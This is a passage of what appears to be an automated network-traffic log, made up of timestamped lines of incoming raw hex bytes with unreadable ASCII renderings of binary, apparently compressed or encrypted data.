\|r:=}aG?.?~`STbjlPk1au&lrxk&bnwO7Oa &c. .^$8l*eCJ5pB(3!hrQuQYX^`
2023-11-18 09:02:40 UTC	3296	IN	Data Raw: 7f 4b 3f 7d 4e 66 af bc 3f 81 8b 1b 21 a6 bc 25 33 ef 0b 60 93 58 33 4e e1 73 ed 1a 73 20 84 1a e1 10 28 de fc 75 48 7d ce de 22 aa a2 e4 1a 55 16 99 85 d4 b6 7c 7d 5e 76 77 ad 00 f9 df df b6 0f a9 51 b0 d9 0c 79 27 41 86 7b 75 c8 29 12 e4 1f 6e 12 b2 9a 20 e3 0d c8 4b bd 44 c8 79 bf 35 05 53 88 33 1d 63 7a ad b4 8d 12 fd 88 c7 ab cb 68 63 5b 10 1f be 5e b1 de 7b c1 eb 3c 54 00 01 4a 0a eb fd 8b dc 79 d9 ae 9e 6b fe f1 1b 85 1e 2f d0 1e 97 1c 29 a9 2d ac f7 d3 fe 95 7c e4 3c b4 95 15 6d 0b ad 2e c6 4b d7 c8 68 58 4a e8 19 55 bf 86 bf 14 ad bd 14 18 0e 5a 21 57 1b ef 99 6c bc c7 26 05 28 64 62 e2 e1 19 e3 50 34 86 47 12 33 05 af 9e 67 9a 06 09 e2 fa 40 29 98 80 71 fa 31 78 2b 89 e1 99 f4 f7 32 9a f0 77 3e fc 8e 36 7e 7f ac 59 fe 7b a1 a1 ea bb da 13 a1 8a Data Ascii: K?}Nf?!%3`X3Nss (uH}"U\|}^vwQy'A{u)n KDy5S3czhc[^{<TJyk/)-\|<m.KhXJUZ!Wl&(dbP4G3g@)q1x+2w>6~Y{
2023-11-18 09:02:40 UTC	3312	IN	Data Raw: f2 ee c1 43 26 fc 18 18 25 a6 10 55 da 4e 2e 6c 14 f9 75 86 66 2b 4a 7d 6f 39 61 4d 48 5e 45 bd 5b a3 c8 ab 28 6d 76 a9 f8 ee ee 8c e1 df 7f 62 ce 20 71 c3 78 73 1b a8 b9 bf 5b c5 3a 75 fd 27 fa 1d bd 30 11 fb a9 01 ad a0 97 1e ed 07 42 fb df 95 0c 6d a2 40 b3 45 40 1b 67 40 3b 6c 40 fb 91 d0 3e 06 b4 5f 21 9a 5f 1e a2 f9 b3 21 1e 22 a1 b7 b8 ee 3c 5e 1c 04 24 ee a4 38 e1 4e 88 c9 d5 fa 9e e2 de 5b 4e e3 5b 9b c6 89 b7 60 87 8d 36 c5 5a f3 53 68 b4 d3 67 f8 c1 51 98 50 a8 ca 6e 53 5f 0a c1 8a 55 ff 52 bf 5b 61 81 dd f7 0c d3 a4 49 0d 49 93 a9 c3 22 7b d0 55 cd 35 2c 5b 2b aa a9 ff cd 1c f1 d5 e0 a6 1d 39 68 14 3f 8f e6 6b e9 40 01 ea d0 c4 9e 78 c1 fb 03 62 2d eb a4 cc 08 39 bf b0 f5 42 80 eb 3e 46 0e d0 86 d1 ea 6c f3 61 34 a0 37 ef bb 45 d4 a8 07 a2 79 Data Ascii: C&%UN.luf+J}o9aMH^E[(mvb qxs[:u'0Bm@E@g@;l@>_!_!"<^$8N[N[`6ZShgQPnS_UR[aII"{U5,[+9h?k@xb-9B>Fla47Ey
2023-11-18 09:02:40 UTC	3328	IN	Data Raw: 18 08 ec ce 99 7b 62 08 c4 78 4f 17 33 77 b7 ee 49 7b 06 22 bb 48 2d f4 21 df ba c7 ed b2 37 23 68 ae 28 51 ef 86 22 87 b5 12 7d ae 3c 37 7d 58 6e dd d3 2f e7 79 58 7d 33 df ec 57 a9 41 c4 54 d9 de cc 22 d8 d8 a8 e4 32 c5 55 60 8c 8c 5f f5 64 54 1a 50 fb 9f cf c0 18 d8 23 da 0f 34 7f 19 a7 db 0f a0 ad 64 8f c6 7c 9c b7 01 8b c8 0e 0b 1c 13 79 46 a0 2f de 9b f9 00 f9 11 6c 62 f3 c0 cb 0a e9 d6 e8 55 fa f9 60 87 89 da 6c 39 56 b0 77 d6 3d 2d b0 21 85 7d 10 d3 10 66 2a cd 09 e8 af 7f fe 39 40 74 47 18 f0 b5 11 80 27 20 b0 83 2d 57 f3 d1 68 75 7a 58 c9 51 11 4a f6 cc 13 4b 86 db e4 e6 dd 2a 48 6f 32 93 c4 b3 9c ab 65 55 14 03 a0 3a 2a 75 c3 43 ff 4f 52 bb 54 eb 1e 69 d7 2a 1c 2e b5 f4 0d aa e4 de a6 bf e9 a3 b6 ca f1 e0 8f 42 2f 5a 48 17 ed f1 a1 2f b1 f4 f2 Data Ascii: {bxO3wI{"H-!7#h(Q"}<7}Xn/yX}3WAT"2U`_dTP#4d\|yF/lbU`l9Vw=-!}f9@tG' -WhuzXQJKHo2eU:uCORTi.B/ZH/
2023-11-18 09:02:40 UTC	3344	IN	Data Raw: 73 8f b1 29 f9 16 90 af 43 95 ef e4 18 93 89 24 5f 4c 85 6c bf 1d 7a 6d b9 dc 6b c7 ad 6a ed 82 89 c2 8c 1d 21 9b 69 84 78 6c f4 f4 13 8f 3f 7b ba 03 13 31 ea d9 d7 a1 36 18 a1 0c 15 c3 d7 66 35 ff cf de 79 ec 91 db 31 6a 7d fb be 00 26 ce ca c9 6a 4d 90 48 6e 1b be fa a9 a0 fe ef c8 8d d2 ff bb a8 53 d5 5c 5e a0 62 2d c5 6c 43 0b 2a 4b ed 88 48 fe d6 36 da cf 16 d7 80 51 75 c4 d8 a8 8a 5f a9 e5 c1 c8 a8 0a c5 ab 3c 54 0b a1 f9 a0 a7 32 b9 dd 20 bd d9 bc d9 aa e8 32 05 0f b2 b1 bb 79 08 1a bb d3 e1 33 c9 d8 3d 22 8c dd 0a 9d b1 8b 96 63 d7 b3 e1 30 2e fe 12 d4 95 25 d6 74 a4 5d 69 8d d0 7d b8 32 1d ab 21 2c 34 af 6f 65 54 41 63 21 6d e2 eb f8 f2 4d 33 45 5d 58 f1 c7 6d c6 46 a5 83 b1 11 7e da 97 73 da ec b5 1d 72 9f b6 b3 27 9b 77 25 63 37 66 79 2c f9 6e Data Ascii: s)C$_Llzmkj!ixl?{16f5y1j}&jMHnS\^b-lC*KH6Qu_<T2 2y3="c0.%t]i}2!,4oeTAc!mM3E]XmF~sr'w%c7fy,n
2023-11-18 09:02:40 UTC	3360	IN	Data Raw: 1f a4 29 bf 36 b5 0d 0d 55 56 81 d7 b8 15 9f 6e 0c 37 fd 6e 92 22 8b ab b5 e1 d7 89 8c 1d 5f ad a1 b3 af 21 97 76 ad 64 95 37 95 c4 71 bb 5b be 65 70 47 87 e7 98 2a 86 db a7 dd 26 47 4f 7b 28 39 ca e1 29 d1 84 ef c9 f5 6c 7f 4d ce 24 23 2f 3e 38 01 ea 8e 2c ba d3 35 7c 70 3a b2 ee d4 4d 08 9e 3a 89 83 33 8a 28 96 9e 62 94 10 96 0c d4 06 a9 ef 21 13 54 8b 41 fa e4 55 4d 32 ef b8 42 d6 62 1d 44 ab 08 0f 7d ee 57 21 88 69 59 c1 1d 05 4d 66 89 7c c6 d1 68 53 d8 0f 9c ba 7e dc ff 4a f4 cb 36 9a f2 ef 1e 07 fc 7c d2 e7 ac 36 32 22 ca 58 4f a5 04 78 d4 56 59 72 e4 ff 1f 77 01 b8 14 70 37 47 b9 c6 ba 9b 3b 3b 3c 85 5a 00 80 01 ba 1e cf a2 1e f7 38 1a f9 d4 57 3a 53 f8 02 9c 88 56 81 fc 3c 40 03 52 60 06 62 c1 e9 99 33 65 85 fa 91 1c 22 6b 2d ca 20 a7 3a 26 14 b7 Data Ascii: )6UVn7n"_!vd7q[epG*&GO{(9)lM$#/>8,5\|p:M:3(b!TAUM2BbD}W!iYMf\|hS~J6\|62"XOxVYrwp7G;;<Z8W:SV<@R`b3e"k- :&
2023-11-18 09:02:40 UTC	3376	IN	Data Raw: 71 10 d0 85 3f c4 37 99 a6 49 7d f1 b4 bf 89 92 57 08 43 7b a4 8c a8 78 13 51 11 1e 4e 2f d3 15 fc 60 a6 52 c1 86 9b ac 67 22 e9 7c cc d1 a3 a7 50 9d cb 8e 9e 12 11 58 9f 1b 03 fd 3c cf 1d 07 b9 51 44 f9 7c 88 7d 01 60 0b b3 d9 c8 9e 28 3c 1a d7 e6 54 43 18 49 22 87 01 b0 92 d9 b1 24 0d cf dd 68 e9 d9 af 9d fc d1 1f b4 fa a3 1f ff c0 1d 7a 94 19 17 cc fb b8 f1 75 0d 59 a5 d5 21 9b 34 b1 c9 5d 0d cc 3d be c6 4a c3 9a 3a 7d 76 60 a0 6b 7e 2c 51 88 4f e7 e2 cc c4 78 7a ef 39 7c ca 2c b6 73 b6 f4 ad 94 df 68 b9 f5 15 25 5b 5f 11 b2 f5 d5 ce af 96 61 43 33 6d c7 9b b4 e7 1d 24 ab 92 68 d7 3c 7d 33 e5 fc 25 18 94 83 9d 9e 76 b3 e0 4f 6e b0 bc 20 10 95 ff 73 03 6e 43 16 88 02 45 79 18 23 38 1d 07 4d 13 05 0b 3a 9d 70 22 ce 7a 68 b3 84 25 37 48 dd 40 5a 45 33 4b Data Ascii: q?7I}WC{xQN/`Rg"\|PX<QD\|}`(<TCI"$hzuY!4]=J:}v`k~,QOxz9\|,sh%[_aC3m$h<}3%vOn snCEy#8M:p"zh%7H@ZE3K
2023-11-18 09:02:40 UTC	3392	IN	Data Raw: 25 2d 49 b8 b4 93 15 0d e2 84 4e 96 5f 18 06 77 32 f5 ce ec 90 de 99 1d f2 3b 33 99 8c 94 a5 46 ef cc 27 5c 66 df 99 b5 77 24 2c 75 49 df 8d fa b6 d0 5b 4c 87 e3 e4 b7 85 1b 64 88 b5 5f 18 b2 a4 b9 2e b3 a9 fe 58 45 aa ef a2 29 be 68 a9 ef 72 1e 55 7a bc a3 51 1a 1f c7 a4 f1 71 ea 34 7e 51 c7 66 53 a5 c5 26 ae 06 22 ce 6a f6 cf fc 4c 27 04 ce 6a 22 a8 b6 83 fb 91 b3 7a e0 e7 a0 74 4b 0f 8a 9c f4 76 a0 b5 36 08 9a 6d 56 33 59 2d a1 4f df 38 4e 2e e8 41 f1 b3 d6 ae 07 a1 bd 01 84 22 80 f0 7b 0c e1 fb 83 90 f6 39 b8 74 6d c1 17 32 5d fb a2 19 ba 96 20 78 f7 20 3f c7 a2 08 a6 03 82 03 3f 21 04 f9 07 45 8f 3d 42 ba 1a a8 55 14 e2 96 b4 df fb 20 3f 22 d0 f6 e7 42 fb e3 70 fb b5 07 34 c4 ed ff b5 6f 32 71 8b 12 0e 34 53 e2 dd e2 44 62 36 3a 2c 9f 7f 58 85 73 9c Data Ascii: %-IN_w2;3F'\fw$,uI[Ld_.XE)hrUzQq4~QfS&"jL'j"ztKv6mV3Y-O8N.A"{9tm2] x ??!E=BU ?"Bp4o2q4SDb6:,Xs
2023-11-18 09:02:40 UTC	3408	IN	Data Raw: 95 e1 7b b9 11 eb 27 c5 b0 fa b9 3d 34 1a 8d 3a 65 8d ac 17 12 50 ca 20 d1 68 ee 54 7a 19 44 c0 f6 ca 1d ec 1c 6d b5 18 0c e5 94 b3 2b c3 8b 01 a7 6c 41 ca 57 10 ca fe 26 2a c8 8a 33 65 cb 3b c2 ae 84 b0 2a 49 95 e1 ad 0a 27 d2 06 89 6c d8 17 ac f1 5f 90 dd 13 c1 d0 9f fc 0e 9c 89 3a 13 38 14 a0 78 f9 9c 84 30 62 a7 42 fb 2d 78 d3 35 e8 ab fc 00 80 75 56 0d 75 69 78 09 9b 8f c3 dc a0 46 d4 b5 d7 7f aa 5e a2 d5 08 74 1d 3b 52 a5 de 56 d0 f6 a2 46 a0 77 5a 15 fb fb 28 95 98 32 51 56 ca e4 29 4b 19 75 9d 7e 0b 04 7c bd 3d 80 8f 95 b9 86 c5 c1 7d 86 01 d6 4a 12 02 16 28 58 f4 88 19 3f 0b 57 ab a3 c1 43 b2 54 f1 7c b4 e5 0e 0f ab 7a 19 4c 43 60 fe 61 2f a4 f3 69 6b 61 96 87 39 eb f2 6c 79 df 31 79 1a 62 5b 08 7e de 9a 81 c7 69 48 87 e4 6c ee 9a 93 2c fc 6a 9b Data Ascii: {'=4:eP hTzDm+lAW&3e;I'l_:8x0bB-x5uVuixF^t;RVFwZ(2QV)Ku~\|=}J(X?WCT\|zLC`a/ika9ly1yb[~iHl,j
2023-11-18 09:02:40 UTC	3424	IN	Data Raw: 0f 5f e9 a7 c5 fa 58 ff fd 7b fd 04 1e 5e bf e0 40 40 49 b7 bb 9d 57 53 83 ae 83 ba f5 cf 8b bd 75 bb 79 9a 0d 46 3f 7e dc fe db 8e fa ab ea 4f 26 98 8b 3c 27 c5 5c 8f f6 91 ac 56 92 ac b6 24 81 ff 4f 4a 24 91 f7 48 31 af 39 0e f3 24 c1 dc 0d 30 07 46 30 91 5b 34 47 e2 e7 3b d5 30 27 a5 a0 c7 1f 8e be 6d 84 11 bd 5a 40 7f 86 d0 7f 1c a6 a0 3f 32 02 46 e4 83 f0 bb 78 24 da 51 31 75 59 50 9a 75 10 cf f4 cc aa d4 fb 3f 27 76 a9 41 47 41 9f ab 5e bf 77 7b 63 2f dd de 2d 5f 18 41 26 a5 a0 be ae 0a 3a d5 e8 d7 aa f5 fa f9 cc cb 0f 50 25 41 80 e6 ac f6 43 00 f3 c5 93 69 a7 f1 cf e1 46 01 9c 22 01 d4 92 00 36 91 00 ae 26 2a 02 78 78 78 a4 d6 fe b0 00 d3 2c c0 6c 26 98 77 00 26 61 78 a4 d6 9e 20 c0 5c 16 60 b6 10 cc 43 00 53 97 0c d5 11 60 4d a3 1e 47 1c 66 2f b4 Data Ascii: _X{^@@IWSuyF?~O&<'\V$OJ$H19$0F0[4G;0'mZ@?2Fx$Q1uYPu?'vAGA^w{c/-_A&:P%ACiF"6&*xxx,l&w&ax \`CS`MGf/
2023-11-18 09:02:40 UTC	3440	IN	Data Raw: 0d 12 25 ea c7 76 13 7e 05 52 a2 2d 9d 05 00 42 a9 8d af 24 74 f9 b9 b8 80 2a 3a 81 52 d8 d9 af ff 12 54 a5 42 65 2d 64 45 91 13 83 33 1e 06 76 96 f0 a2 ca fa 7a 4f 1c 68 b1 3e 4b 83 f7 01 18 b6 2a f1 0e 0c c1 1e 49 85 8b 24 45 74 62 f6 8e d2 33 3b 5f f1 42 62 cc 6a 76 d0 1b 9e 71 0d ba 60 66 e5 74 3f ca 8a 52 2d 74 e2 8d 5b 5c 6d a8 00 1a d4 7b 6a 0b ec 99 fd 63 11 7a b3 29 b5 e7 75 4d 1a ca e6 b7 dd 5d ab 20 d5 9a 2a 25 5e ab 4a a0 64 1c af cf ca 75 12 1c 2b 13 22 8a 1a 9c 8c 7d 5b 25 95 3a 18 dd 56 0a a5 aa 2b f3 dd 24 bc b4 a1 ff c9 0b 9e 69 6f b6 52 bb 48 06 11 a7 85 a4 ec 19 15 be 89 32 68 98 91 02 05 39 ab 82 61 8f 4e 96 3e ea c2 54 33 ac 67 f5 1a c2 5d 85 4c ed 2d 1f ed cd 52 7d 5e 8c bd 36 dd 4e 90 26 0e cc a1 46 da 74 7f f9 97 69 ec 62 ab 80 20 Data Ascii: %v~R-B$t:RTBe-dE3vzOh>KI$Etb3;_Bbjvq`ft?R-t[\m{jcz)uM] *%^Jdu+"}[%:V+$ioRH2h9aN>T3g]L-R}^6N&Ftib
2023-11-18 09:02:40 UTC	3456	IN	Data Raw: 51 d3 34 14 c0 b1 14 4f 79 96 69 7e 93 49 93 50 62 9d 57 85 df 48 f7 55 b2 e3 28 fb 10 17 1c 99 7e ea 2b 8d 79 e1 49 36 7f 14 fa e8 e0 25 55 4c 0c 10 9d 35 15 72 6b f4 6d 29 f3 66 e8 fb e8 43 c1 84 2d 90 1a 70 17 95 1f b9 a7 ea b7 e4 46 f0 fa ba 68 49 23 35 c4 da 0c e6 e5 c4 82 f3 7f a1 62 91 06 8d 68 9e e6 ef 36 d7 ce 7a 29 d8 76 2c 4a 6e d7 6f 69 0e f8 8b 31 fb 47 66 42 ff 76 5e 1f fd 6c 49 2e 78 c3 84 34 43 a8 42 b8 6e f0 77 4d 12 1d b8 22 86 b6 d3 39 c3 00 27 d5 a9 98 ba f2 39 83 64 4e 75 8a 99 4c 9b f0 58 0f d2 11 84 72 36 16 b8 d0 0d d0 a1 25 50 45 37 b6 ee e5 24 94 da c8 43 19 9a 67 c6 68 fe 21 5b 99 cc 35 ce 71 83 4a 8c 6e 2b d0 dd b8 ee 7b ab 8a 82 e2 fd 2b ef d3 b8 6a 83 f8 ee 9b 08 18 dc 09 8f ef 58 e8 77 1f 94 02 dc 41 22 00 2d 25 fb 3e 88 72 Data Ascii: Q4Oyi~IPbWHU(~+yI6%UL5rkm)fC-pFhI#5bh6z)v,Jnoi1GfBv^lI.x4CBnwM"9'9dNuLXr6%PE7$Cgh![5qJn+{+jXwA"-%>r
2023-11-18 09:02:40 UTC	3472	IN	Data Raw: ac a5 a9 b3 bc b9 11 83 07 d0 d3 8d 7b 89 33 5e 3f a3 8d 5c 2e d0 47 fd 8e 91 b1 a9 67 b8 9b bb 97 81 bc 72 86 f4 bc a7 23 dc a8 03 e4 d3 e3 1d c8 f3 c0 5f b9 4f ef 7c 49 4e ff b6 98 6b b3 ed 00 fd cd 67 24 1d 7b f5 47 5a ba 69 08 39 23 ce 22 b5 ba 75 24 6b 26 f5 a5 ef 7f d6 98 f4 9f 31 8e 98 56 cd e4 66 fd d1 9b 66 c7 5d e5 9e 65 46 90 36 63 73 b9 fd 6b 67 50 f5 d4 5c 3a af 3c 9f fe 72 ae 16 f1 fb 62 3b 19 b8 bb 13 7d 32 2b 94 3e 0a d9 2c 7e bb ba 8c 6c 30 dd 25 fa 56 5e f4 d7 1d 0b c8 dc ae 97 49 dc 1d 3b d1 ff ad e7 64 e6 ed 17 f4 d7 19 a7 69 d8 e6 fe dc 3b 6d 5c 49 f9 a0 1c f1 e1 b1 7e 74 73 59 5d 72 ef 77 05 cd f7 7e 4c a2 6e 2f a2 e3 47 af 16 c5 05 11 64 e0 93 62 51 33 3a 96 34 cc fe 8c fe d6 a5 82 dc fd b0 98 0b 8a 2d a1 67 06 f7 e0 9c ea 38 d3 cd Data Ascii: {3^?\.Ggr#_O\|INkg${GZi9#"u$k&1Vff]eF6cskgP\:<rb;}2+>,~l0%V^I;di;m\I~tsY]rw~Ln/GdbQ3:4-g8
2023-11-18 09:02:40 UTC	3488	IN	Data Raw: 83 fe 17 de 73 4b cf a8 61 77 a3 1a 50 31 72 16 3c 1a 5f 9b d9 da 64 27 6c 1b 3b 85 ab 1f de 0f e7 1d 9b 84 6b a6 ed 86 e1 0f 8f 71 0b 36 8d 80 79 7d bf 72 8f d9 06 10 76 aa 01 94 2b e3 06 9d 2c 5d 18 ae e3 47 f4 5c 11 0e 47 53 f2 e0 8e 64 5f 06 63 86 63 a3 e8 d2 d0 f0 6e 16 60 9f a6 32 1b 3d 66 40 a3 a1 f7 b9 a3 58 19 3c a6 67 83 19 f5 22 b0 e2 a6 de 90 fa cf 54 2c 7d fc 02 e3 b1 92 a7 89 66 4f c4 a4 81 45 a1 51 b7 c3 f8 36 7e 27 30 7f 4f e0 94 6d ed 90 f3 e4 5d d8 6d fc 8e 49 fd 8b 72 43 5b f9 e1 08 1e 3f 5f ae 58 1c 07 15 3c 8d a9 53 96 83 a5 48 09 66 71 8b f2 d8 fd 55 4f 78 b4 fe 0b 84 19 37 70 67 97 a7 c0 4d c3 42 3c 15 f5 18 7f bf 7f 87 3b 13 d7 12 a3 c2 72 c0 a0 ad 5a 58 5e 76 3e 16 9a df 0d 6b 15 cb c3 68 0f 6f c4 7e 21 8b 99 45 43 8f 43 e2 92 a5 Data Ascii: sKawP1r<_d'l;kq6y}rv+,]G\GSd_ccn`2=f@X<g"T,}fOEQ6~'0Om]mIrC[?_X<SHfqUOx7pgMB<;rZX^v>kho~!ECC
2023-11-18 09:02:40 UTC	3504	IN	Data Raw: e8 93 c5 ab 6b d8 04 22 d0 14 23 24 6c 24 5c a3 a7 96 e5 e4 db e7 78 fe 71 16 27 68 80 fb 7f 35 80 0a ab 1b c0 6e f1 3b 76 4d 03 18 b8 ae 01 cf 3c 98 a8 94 ab 9a 15 9a 11 c5 84 78 b5 45 70 27 c1 37 89 2a 78 c9 7a 24 3c aa 21 34 54 5b 9c 43 e3 a2 b8 e1 66 cd 58 a1 43 0c cf 30 83 82 7c 1a 84 37 8a 88 64 85 67 b9 ef 4c da cb b5 a9 af c6 38 5d 82 de 48 f7 69 21 59 78 64 18 0b 19 a4 4d 72 1d 21 9d b8 b9 4b 8d 34 0a 97 24 65 98 4f b0 62 d1 d2 3c 36 aa 96 e1 e4 15 84 49 9e b6 10 51 44 64 b2 48 c5 d1 0b 02 49 e7 c4 e9 e9 e5 05 99 b4 45 6d d5 05 fa 2b 74 46 e2 80 83 3a 55 52 43 74 4c 08 4b 65 ec a1 2c 71 8e 9a e1 2c 54 a6 ad 8f 3c 8a 02 88 8e 68 1d 12 1b 9e 0e 82 73 1a a4 07 21 8f 73 cc 52 f1 86 23 42 0a 3b 76 47 87 a0 8a 6c c3 82 f1 ba a0 68 1e 47 a4 32 54 a6 48 Data Ascii: k"#$l$\xq'h5n;vM<xEp'7*xz$<!4T[CfXC0\|7dgL8]Hi!YxdMr!K4$eOb<6IQDdHIEm+tF:URCtLKe,q,T<hs!sR#B;vGlhG2TH
2023-11-18 09:02:40 UTC	3520	IN	Data Raw: 2c 80 ef ce fa f3 c7 3a f4 e4 08 ee 4b 38 1e f9 de 78 f9 c1 c5 bd 28 af 35 de 48 5e 6b 7c c0 47 e5 f7 45 84 d1 9e 1a 93 6a 6f 52 eb d7 cf 1a d0 67 5a 5c 5d ee d1 75 a4 3e 0e 7a fd f5 ad 8a eb 9a 8e 5a 8a a1 89 f1 a6 52 cb 3e 5e ff ae 8e be dd 52 ba aa 64 19 e4 c3 66 c8 ec 1b e2 e7 ff be ea 1e fe e9 ff fe cf c3 3f f9 6a 69 bc df af ff c6 fc fa fa 01 7e fe 9d cb ff 03 a7 27 5f 2f 19 9f 7e 17 28 40 10 74 ef 34 52 eb 0a 25 b4 41 99 aa b8 73 45 7c cf 3c c8 ec ae 2b a7 41 ac d6 af 6b b0 1e af b2 ac 0b a2 05 08 30 3f 03 0f eb 46 a7 2a 68 ad d1 57 59 29 35 98 1f 25 13 72 b3 34 2c df a1 0a 4d cf 6b b3 b9 9a ce 2f d3 72 98 92 1e fd 0f 69 b6 b5 8e 69 7b ee ed c5 5f 67 8e 6a f9 67 9d f9 a8 1f f0 f9 34 fc 29 4d 56 21 d1 4d 38 b1 61 e6 bc 2f 66 f0 f4 c7 62 59 a2 8e 0e Data Ascii: ,:K8x(5H^k\|GEjoRgZ\]u>zZR>^Rdf?ji~'_/~(@t4R%AsE\|<+Ak0?F*hWY)5%r4,Mk/rii{_gjg4)MV!M8a/fbY
2023-11-18 09:02:40 UTC	3536	IN	Data Raw: ae 37 92 06 ca 11 c4 b2 0e ac 5b 56 af 52 bf 1c 37 ee 04 9c 5a be 65 2e ca 1d c3 f8 79 f0 57 30 40 53 8b c5 c2 30 9e c6 e8 0a 93 9b b0 d9 28 50 70 c5 21 0b 76 39 31 7d 0d 53 22 1e 5a 51 17 01 25 7e 4b fa 02 d8 b5 7a 69 0c a1 62 8f 65 e9 b9 b0 68 5e 99 f2 0e e7 c5 0a 6a 94 a1 96 fa c9 2f 7c 53 1d 9f e8 d5 5c ae af 59 ae 94 cf dd 0e 15 2e 58 f3 2f 9c 0b 06 eb 9c 54 75 b9 87 de 0f d6 27 ad d7 65 3b a1 e0 1b 9a 3b 8d e6 d1 3c 9f 85 7a fd 18 36 54 36 5b ec e3 9f 03 35 5b 34 8f 3c 49 9b be 8b b3 64 47 d5 eb eb a2 fc 92 88 a3 40 85 80 16 67 88 f1 12 b8 c1 dd 5e 37 3c e9 be 78 f9 bc dd 6b 9f ea 44 ea 05 53 25 8b ad f4 b3 01 5b c3 9e 48 e5 b7 d6 a4 03 ef db 48 49 69 71 7e a9 0f fc 77 20 ae b8 03 cc 2e e9 0b 2c 56 ec 40 09 bf 66 5e 49 93 98 a0 05 1a 3b 65 7a 77 3c Data Ascii: 7[VR7Ze.yW0@S0(Pp!v91}S"ZQ%~Kzibeh^j/\|S\Y.X/Tu'e;;<z6T6[5[4<IdG@g^7<xkDS%[HHIiq~w .,V@f^I;ezw<
2023-11-18 09:02:40 UTC	3552	IN	Data Raw: 85 a6 ec 5a 63 6c 5d 39 fe 96 81 b7 de c4 d6 0f c3 ac 02 c7 59 27 a1 11 d3 65 42 2c 61 88 c9 5e e2 25 1f 15 a8 cb d5 3f 20 c6 1a 1e 75 b3 2c 6a 78 a6 c3 a5 50 2a ea 1a 46 ee 00 09 7c 44 45 30 1e e0 72 50 6f f6 3a 06 12 e2 db 88 75 06 c4 e9 6b 3b 2e a0 da 1c 5f ae 54 6a 5d e3 21 1d d9 64 a3 72 c4 5e f9 a8 d1 33 1e 6a 19 49 2d 86 22 b3 bd 57 6e 50 be 3d 0f f9 33 dc 2b be 3d 27 46 39 06 39 dc ab 37 6a 04 82 b2 2a ac 2b 14 b9 b0 3c df f2 b1 b3 22 57 73 c1 73 82 e3 d6 51 a3 ba db 80 d5 14 53 b5 a6 4a c1 2c 9c 07 f0 c0 35 f5 bd d3 b8 7a f5 66 bb d3 da ef d4 ba 58 f9 18 56 31 dc cd c0 97 1b 9d 5a b9 7a 9f eb d3 65 84 db d3 c9 a8 14 57 e2 e1 0f 78 19 ed 75 65 4d 50 b7 70 10 8e 5c 59 82 6c 24 ad 7c 97 c0 ab b5 6e af 5c ad 76 3a b5 d7 8c 87 9a 57 5c d9 44 96 0d d2 Data Ascii: Zcl]9Y'eB,a^%? u,jxPF\|DE0rPo:uk;._Tj]!dr^3jI-"WnP=3+='F997j+<"WssQSJ,5zfXV1ZzeWxueMPp\Yl$\|n\v:W\D
2023-11-18 09:02:40 UTC	3568	IN	Data Raw: 5a 8b d6 b3 f7 59 db aa b6 22 a9 a9 c3 6c 0b e2 b2 cc 7c 88 0b 93 cb e0 8f 68 af 89 6b cc 0e 67 10 db b8 22 f3 dc 2c 52 d6 a2 e6 ea 82 25 e4 ba 73 5f 4d de 51 1a 83 2d d2 19 ce b1 c6 37 4b 83 77 9d cb bf 1e de ff be ab f0 88 99 97 5a d6 7e f9 c8 b2 46 1b 5e 09 f3 60 19 cd c3 d5 e8 9c 23 49 8f 72 dd e3 1f d2 dd 99 a9 b1 d7 73 54 d2 42 a8 2f 77 9c 6a a1 db aa bf 53 f7 de 55 ee 33 0b 51 bd fc 95 4c f2 cf 6e b1 fd c9 8e c7 be 4e 3c d4 32 d8 6f f3 fe e1 bb 29 a4 e5 42 43 fc eb 5b c3 fc 0d 0b 9d 51 9d cd 66 34 33 d3 be f1 f2 3e 4e e3 15 34 4b 0c 6a b2 52 e7 95 6f f3 b6 29 dd 70 ad 1e 81 07 e8 b8 8e b0 45 d1 3a 4b 7f 8e 29 4d 63 88 ec f1 7f 78 ec 42 53 32 39 97 a1 b6 ae bf af 18 fa 02 27 ad 9d 2b 65 5e e7 5d 62 e0 65 76 eb 8b b6 99 b7 34 6f 8d a3 22 b3 5f 5d 98 Data Ascii: ZY"l\|hkg",R%s_MQ-7KwZ~F^`#IrsTB/wjSU3QLnN<2o)BC[Qf43>N4KjRo)pE:K)McxBS29'+e^]bev4o"_]
2023-11-18 09:02:40 UTC	3584	IN	Data Raw: 40 5d 86 62 d0 ba ea 21 f4 bb 7f 17 f8 20 a7 1f e8 d8 26 05 24 06 bd 81 d5 63 fc e0 2d 82 4d a8 71 2e 04 2c 6d 10 03 de 7d 3d 02 c2 13 e0 10 66 6b 69 f0 56 6e 1f 18 f8 28 17 38 5d 70 05 a4 66 38 0d 58 19 f5 80 17 a8 69 c1 47 cd 49 40 b8 6b 20 c0 f1 24 04 c2 23 bd 00 5a 9a 55 42 6e 90 dc 04 8f 92 18 41 6a b2 3d c1 7a af 15 08 27 b5 24 90 10 ca 02 d8 5f ee 07 3b b7 ea a1 23 b0 07 a0 cc 41 5b c8 8b c5 57 00 34 9c 17 7a e9 1c 3b 98 51 c5 0e 42 9c 2d 01 9e de 9b 40 3b 63 02 e0 53 e8 06 bd 5a 6a 02 80 ea 21 40 6f 17 0b e0 8f b8 00 4e 5d 1f 06 b9 a5 e7 20 f5 82 55 e0 c4 c0 5b c8 65 f3 0f 60 ff fe 04 f0 4b f3 01 60 21 ca 06 90 e8 98 04 2c 72 93 a1 d5 71 2b 40 3a 74 04 f4 7f 01 01 de c7 12 01 a9 3a 14 e0 f5 92 cf e0 ed cb 4b 80 26 2f 07 b4 da 68 08 28 fc ce 0d f5 Data Ascii: @]b! &$c-Mq.,m}=fkiVn(8]pf8XiGI@k $#ZUBnAj=z'$_;#A[W4z;QB-@;cSZj!@oN] U[e`K`!,rq+@:t:K&/h(
2023-11-18 09:02:40 UTC	3600	IN	Data Raw: 92 ae 81 06 d3 08 f6 63 59 89 0e 59 bb f3 4a a6 0b a7 86 4e 2c 21 73 49 e6 7c c6 4d cc 76 63 35 67 5d aa 98 46 94 5d 24 35 f0 00 d2 5a 4d 1e 07 8a dc 58 c9 2d e6 65 0a 1d 78 72 84 77 f4 92 88 5e 1b dd c2 dc fd e2 7b 3f 53 bf f5 1b f5 e7 6f 1b bf 77 1a bf bb f2 f0 7b 97 3d 92 89 ab 06 87 f5 05 79 dd a8 db ee 07 b8 32 89 9a 8a c1 14 8c 48 09 15 9d e3 18 f8 f9 55 5e e1 89 29 25 21 45 3d 43 5b 3c 3d ce 33 b0 38 86 03 5a 0a ea 5a 4c 50 a7 85 70 45 40 36 b9 6c a6 05 7b 4c 8c b1 8e 52 43 f0 a6 4f 91 ba 81 7f a0 88 c7 e5 3c 1d 31 20 32 32 4c a0 7c 37 49 34 e7 a7 bb 88 ad aa af fb 8d 07 fa 6d 1a 9b ba 79 bb 46 f1 